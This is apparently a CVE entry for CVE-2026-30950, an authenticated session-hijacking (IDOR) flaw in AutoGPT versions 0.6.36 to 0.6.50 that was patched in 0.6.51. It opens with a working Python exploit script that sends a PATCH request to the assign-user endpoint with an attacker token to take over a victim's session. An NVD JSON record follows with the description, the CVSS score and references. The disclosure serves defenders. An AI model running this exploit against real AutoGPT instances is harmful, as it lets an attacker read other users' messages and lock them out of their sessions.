CVE-2026-30950

import requests # Configuration TARGET_URL = "http://target-autogpt-instance.com" VICTIM_SESSION_ID = "uuid-of-victim-session" ATTACKER_TOKEN = "attacker_jwt_or_api_token" # Vulnerable Endpoint url = f"{TARGET_URL}/sessions/{VICTIM_SESSION_ID}/assign-user" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Exploit attempt: Send PATCH request to hijack the session # The vulnerability allows any authenticated user to assign a session to themselves # by bypassing the ownership check. try: response = requests.patch(url, headers=headers) if response.status_code == 200: print("[+] Exploit successful!") print(f"[+] Session {VICTIM_SESSION_ID} is now assigned to the attacker.") else: print(f"[-] Exploit failed. Status Code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-30950", "sourceIdentifier": "[email protected]", "published": "2026-05-18T23:16:33.190", "lastModified": "2026-05-19T15:16:28.720", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.6.36 through 0.6.50 are vulnerable to Authenticated Session Hijacking via IDOR. If an authenticated attacker can determine the session_id of another user's session, they can take it over, reading any messages in it and locking the legitimate user out. The PATCH /sessions/{session_id}/assign-user endpoint authenticates the caller but never verifies session ownership: the service layer invokes the session lookup with user_id=None, which the data access layer interprets as a privileged/system call that bypasses the ownership filter, allowing any authenticated user to reassign an arbitrary session to themselves. This issue has been patched in version 0.6.51."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/Significant-Gravitas/AutoGPT/commit/eca7b5e79370c34ed75e80badb824023d7d8629d", "source": "[email protected]"}, {"url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-q58p-v9r9-7gqj", "source": "[email protected]"}, {"url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-q58p-v9r9-7gqj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}